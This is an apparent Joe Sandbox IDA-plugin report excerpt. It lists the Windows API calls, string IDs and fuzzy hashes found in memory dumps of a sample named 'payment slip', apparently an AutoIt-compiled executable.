                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 000C6382
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$ClientMoveRectScreen
                                        • String ID: U
                                        • API String ID: 3880355969-2399391058
                                        • Opcode ID: 889c98171c8136d8c5efb7380aad6016e9270beb11f815b6181843ad178da9a8
                                        • Instruction ID: ab0ce2fea6f6f1fddf5e3ef4e073f18c9d6a11bc13c14e60efa816a012c119b5
                                        • Opcode Fuzzy Hash: 889c98171c8136d8c5efb7380aad6016e9270beb11f815b6181843ad178da9a8
                                        • Instruction Fuzzy Hash: 4C514A70A00649AFDB20DF68D980EAE7BF5EB45360F10826DF8559B2A1D731AE81CB50
                                        APIs
                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00097206
                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0009723C
                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0009724D
                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000972CF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                        • String ID: DllGetClassObject
                                        • API String ID: 753597075-1075368562
                                        • Opcode ID: c0a172c70f9b0e3d89e55171a2dcd6a761f0f9debb0d81bf49c8d9ea44842ef0
                                        • Instruction ID: 2c87bd64bb4d5f2af65b8c79ea4e0f53eb747df96d5298733aa2de7012e7e6bd
                                        • Opcode Fuzzy Hash: c0a172c70f9b0e3d89e55171a2dcd6a761f0f9debb0d81bf49c8d9ea44842ef0
                                        • Instruction Fuzzy Hash: 7141AF72624204EFDF25CF54C884A9A7BA9EF45710F2480ADFD099F24AD7B1DD40EBA0
                                        APIs
                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 000C5352
                                        • GetWindowLongW.USER32(?,000000F0), ref: 000C5375
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 000C5382
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000C53A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: LongWindow$InvalidateMessageRectSend
                                        • String ID: U
                                        • API String ID: 3340791633-2399391058
                                        • Opcode ID: eb063d5704efe806c980da6b655c440f4e12b193fdc8fd0d479d3d0183af9edd
                                        • Instruction ID: 6b086df7715d862ea9fae2cce252366979d28267ed05fe02aaafc807145ae4e0
                                        • Opcode Fuzzy Hash: eb063d5704efe806c980da6b655c440f4e12b193fdc8fd0d479d3d0183af9edd
                                        • Instruction Fuzzy Hash: 7031B238B55A88AFEB709B14CC05FEC77A5AB04392F58410AFA51961E2C7B4BBC09B41
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 000C769A
                                        • GetWindowRect.USER32(?,?), ref: 000C7710
                                        • PtInRect.USER32(?,?,000C8B89), ref: 000C7720
                                        • MessageBeep.USER32(00000000), ref: 000C778C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Rect$BeepClientMessageScreenWindow
                                        • String ID: U
                                        • API String ID: 1352109105-2399391058
                                        • Opcode ID: 14af9ab6cd3e6dcc0161762e49419115f5c5b76f942ace82172e09d0f6da11aa
                                        • Instruction ID: eaa1fb6d56119dc77ba2f80312ce49cfc3893fc71c19094aabfbcb89a3fef6fb
                                        • Opcode Fuzzy Hash: 14af9ab6cd3e6dcc0161762e49419115f5c5b76f942ace82172e09d0f6da11aa
                                        • Instruction Fuzzy Hash: 9A419C34609218AFDB51CF68C898FAD77F4BB48304F1882ACE4589B2A1C374A981CF90
                                        APIs
                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 000C4705
                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 000C4713
                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 000C471A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$DestroyWindow
                                        • String ID: U$msctls_updown32
                                        • API String ID: 4014797782-3180792962
                                        • Opcode ID: c90317a6cdccb7faa2bb752a64735539e376221d574c947a2858013827d8cd6b
                                        • Instruction ID: 9c90a4b2d80dd4943057b60e4c428fbe639b8d72d48f621bfb7f32a21bfc567a
                                        • Opcode Fuzzy Hash: c90317a6cdccb7faa2bb752a64735539e376221d574c947a2858013827d8cd6b
                                        • Instruction Fuzzy Hash: E9215CB5604208AFEB11DF64DC91EAB37EDEB4A3A8B040159FA049B352CB71EC51CB60
                                        APIs
                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 000C2F8D
                                        • LoadLibraryW.KERNEL32(?), ref: 000C2F94
                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 000C2FA9
                                        • DestroyWindow.USER32(?), ref: 000C2FB1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                        • String ID: SysAnimate32
                                        • API String ID: 3529120543-1011021900
                                        • Opcode ID: 100f4882cafac72c385293d565a669e915cf3c5af4cea67909d03b528858d35e
                                        • Instruction ID: 18da10f83344b2438dbb1aff751c2f6d216a065a2675f4c2b1c49ce40dfee653
                                        • Opcode Fuzzy Hash: 100f4882cafac72c385293d565a669e915cf3c5af4cea67909d03b528858d35e
                                        • Instruction Fuzzy Hash: 83218672200209ABEB218FA4DC80FBF77B9EB59364F10423DFA54965A0D671DC929760
                                        APIs
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                        • GetCursorPos.USER32(?), ref: 000C9001
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00087711,?,?,?,?,?), ref: 000C9016
                                        • GetCursorPos.USER32(?), ref: 000C905E
                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00087711,?,?,?), ref: 000C9094
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                        • String ID: U
                                        • API String ID: 2864067406-2399391058
                                        • Opcode ID: 82bd185476148864771cd8e55974df4087db3ea4d030abc67abf04812ccd79c1
                                        • Instruction ID: 31fe7bff27e73371338bb172d6dd8d8ab8892d87415811b3e1e8b6cf347743c5
                                        • Opcode Fuzzy Hash: 82bd185476148864771cd8e55974df4087db3ea4d030abc67abf04812ccd79c1
                                        • Instruction Fuzzy Hash: 67219C35600118FFDB258F94C858FEE7BF9EB89350F244069F9058B2A1C3759990DB60
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00054D1E,000628E9,?,00054CBE,000628E9,000F88B8,0000000C,00054E15,000628E9,00000002), ref: 00054D8D
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00054DA0
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00054D1E,000628E9,?,00054CBE,000628E9,000F88B8,0000000C,00054E15,000628E9,00000002,00000000), ref: 00054DC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: 1c6fc0a6c5c45ae69df1da91e6e02f616145db8daec020c8706c256f638d124e
                                        • Instruction ID: ae99454ce7809b09e65a77067d877e355af7b897ac9b877d4b4601e1c914f2a6
                                        • Opcode Fuzzy Hash: 1c6fc0a6c5c45ae69df1da91e6e02f616145db8daec020c8706c256f638d124e
                                        • Instruction Fuzzy Hash: 0EF03C34A40208ABFB119B91DC49FEEBBF5EF44756F0400A5ED09A6260CB745A84DAA1
                                        APIs
                                        • LoadLibraryA.KERNEL32 ref: 0008D3AD
                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0008D3BF
                                        • FreeLibrary.KERNEL32(00000000), ref: 0008D3E5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: GetSystemWow64DirectoryW$X64
                                        • API String ID: 145871493-2590602151
                                        • Opcode ID: 76fd550c57751fcdc1f0d0b0c3082e7f6a04b5db6747051baa73c4357b6b575a
                                        • Instruction ID: 305bc779e533fb76bb0e11053e76d874639cd1aee333fd983066eb9d81c460b6
                                        • Opcode Fuzzy Hash: 76fd550c57751fcdc1f0d0b0c3082e7f6a04b5db6747051baa73c4357b6b575a
                                        • Instruction Fuzzy Hash: 65F02770405521ABF7713710CC24D6D7710BF21701F544317E889F2085CB24CE408782
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00034EDD,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E9C
                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00034EAE
                                        • FreeLibrary.KERNEL32(00000000,?,?,00034EDD,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034EC0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                        • API String ID: 145871493-3689287502
                                        • Opcode ID: aa718e638e498757b1d752df10f75b8023764fcaf30734eda3ebb9f1f37d6541
                                        • Instruction ID: 7fa502b466a8f14d8a771a43eff0fa5f36cef0c688b609e25665f9d80ea38070
                                        • Opcode Fuzzy Hash: aa718e638e498757b1d752df10f75b8023764fcaf30734eda3ebb9f1f37d6541
                                        • Instruction Fuzzy Hash: F0E0CD35E025225BF2731726EC18F6F759CAFC2F62F090115FD08D6110DB74DD0240A0
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00073CDE,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E62
                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00034E74
                                        • FreeLibrary.KERNEL32(00000000,?,?,00073CDE,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E87
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                        • API String ID: 145871493-1355242751
                                        • Opcode ID: 06cb985543c46199f4a94769b046ec5e619bff00830c2900abf25c3633b75225
                                        • Instruction ID: fd6b52087604cb1edace48b71b1686ef44f128de4d1be8e9e20b7805669c7b7a
                                        • Opcode Fuzzy Hash: 06cb985543c46199f4a94769b046ec5e619bff00830c2900abf25c3633b75225
                                        • Instruction Fuzzy Hash: 20D0C232902A215776231B26EC18E8F3A5CAF82F217090114FE08AA110CF24CD0281D0
                                        APIs
                                        • GetCurrentProcessId.KERNEL32 ref: 000BA427
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 000BA435
                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 000BA468
                                        • CloseHandle.KERNEL32(?), ref: 000BA63D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                        • String ID:
                                        • API String ID: 3488606520-0
                                        • Opcode ID: 84d452792a690b695d6992e17e016b56910cf8f38e85aff711c9fbddf6fe9a0f
                                        • Instruction ID: 0c39c7852a2acdb076bb9b887cc3dce990163d1f5a8053a072280e3559fd9a72
                                        • Opcode Fuzzy Hash: 84d452792a690b695d6992e17e016b56910cf8f38e85aff711c9fbddf6fe9a0f
                                        • Instruction Fuzzy Hash: A0A1A2B1604701AFE720DF24C886F6AB7E5AF84714F14881DF69ADB392D770ED418B92
                                        APIs
                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,000D3700), ref: 0006BB91
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0010121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0006BC09
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00101270,000000FF,?,0000003F,00000000,?), ref: 0006BC36
                                        • _free.LIBCMT ref: 0006BB7F
                                          • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                          • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                        • _free.LIBCMT ref: 0006BD4B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                        • String ID:
                                        • API String ID: 1286116820-0
                                        • Opcode ID: 79d47e4ddf8b71e286c5fd14da9104088c0625032a4f378241879e1395d84114
                                        • Instruction ID: d39894f3010eb33122d0f62e9c0b97f992a288ae6d17b471eacd4a87b7ac39e2
                                        • Opcode Fuzzy Hash: 79d47e4ddf8b71e286c5fd14da9104088c0625032a4f378241879e1395d84114
                                        • Instruction Fuzzy Hash: 2351D8B1900219AFDB20DF65DC819AEB7FAEF40360B10426AE554D7292EB749FC18B50
                                        APIs
                                          • Part of subcall function 0009DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0009CF22,?), ref: 0009DDFD
                                          • Part of subcall function 0009DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0009CF22,?), ref: 0009DE16
                                          • Part of subcall function 0009E199: GetFileAttributesW.KERNEL32(?,0009CF95), ref: 0009E19A
                                        • lstrcmpiW.KERNEL32(?,?), ref: 0009E473
                                        • MoveFileW.KERNEL32(?,?), ref: 0009E4AC
                                        • _wcslen.LIBCMT ref: 0009E5EB
                                        • _wcslen.LIBCMT ref: 0009E603
                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0009E650
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                        • String ID:
                                        • API String ID: 3183298772-0
                                        • Opcode ID: ca9f9493f9fab2a36793e0b5b765e3d1801730a8766c6cedadec83363495c5e9
                                        • Instruction ID: 9b4d456def73e08312c04bea2c2009a0508a6ba5685c76040a9087bd311efcbe
                                        • Opcode Fuzzy Hash: ca9f9493f9fab2a36793e0b5b765e3d1801730a8766c6cedadec83363495c5e9
                                        • Instruction Fuzzy Hash: 1D5151B24083859BDB64DB90D8919DF73ECAF85340F00491EF689D3192EF74A6889766
                                        APIs
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                          • Part of subcall function 000BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000BB6AE,?,?), ref: 000BC9B5
                                          • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BC9F1
                                          • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA68
                                          • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA9E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BBAA5
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000BBB00
                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 000BBB63
                                        • RegCloseKey.ADVAPI32(?,?), ref: 000BBBA6
                                        • RegCloseKey.ADVAPI32(00000000), ref: 000BBBB3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                        • String ID:
                                        • API String ID: 826366716-0
                                        • Opcode ID: a9b84867dd1b90dc9eef7f5ba8d0410f89b6bce78e3da367a3249b1f9078358b
                                        • Instruction ID: 5b8a3b6fb320df49dc0649e791a967c818ab36f9f6d24b3c45223a70e69f251f
                                        • Opcode Fuzzy Hash: a9b84867dd1b90dc9eef7f5ba8d0410f89b6bce78e3da367a3249b1f9078358b
                                        • Instruction Fuzzy Hash: 7361B231208241EFD714DF14C890EAABBE9FF84308F54855DF4998B2A2DBB1ED45CB92
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 00098BCD
                                        • VariantClear.OLEAUT32 ref: 00098C3E
                                        • VariantClear.OLEAUT32 ref: 00098C9D
                                        • VariantClear.OLEAUT32(?), ref: 00098D10
                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00098D3B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Variant$Clear$ChangeInitType
                                        • String ID:
                                        • API String ID: 4136290138-0
                                        • Opcode ID: fabd1198de1af50a6ca091954a387c7b472c529e0bfcd900005526058945e37d
                                        • Instruction ID: 7e7b9e5f4a6e107aa4bc15f98bd8b17c0405ae819c3ebd72f59a45b93c98794c
                                        • Opcode Fuzzy Hash: fabd1198de1af50a6ca091954a387c7b472c529e0bfcd900005526058945e37d
                                        • Instruction Fuzzy Hash: 145146B5A01219EFDB14CF68C894EAAB7F8FF89310F158569E909DB350E734E911CB90
                                        APIs
                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 000A8BAE
                                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 000A8BDA
                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 000A8C32
                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 000A8C57
                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 000A8C5F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
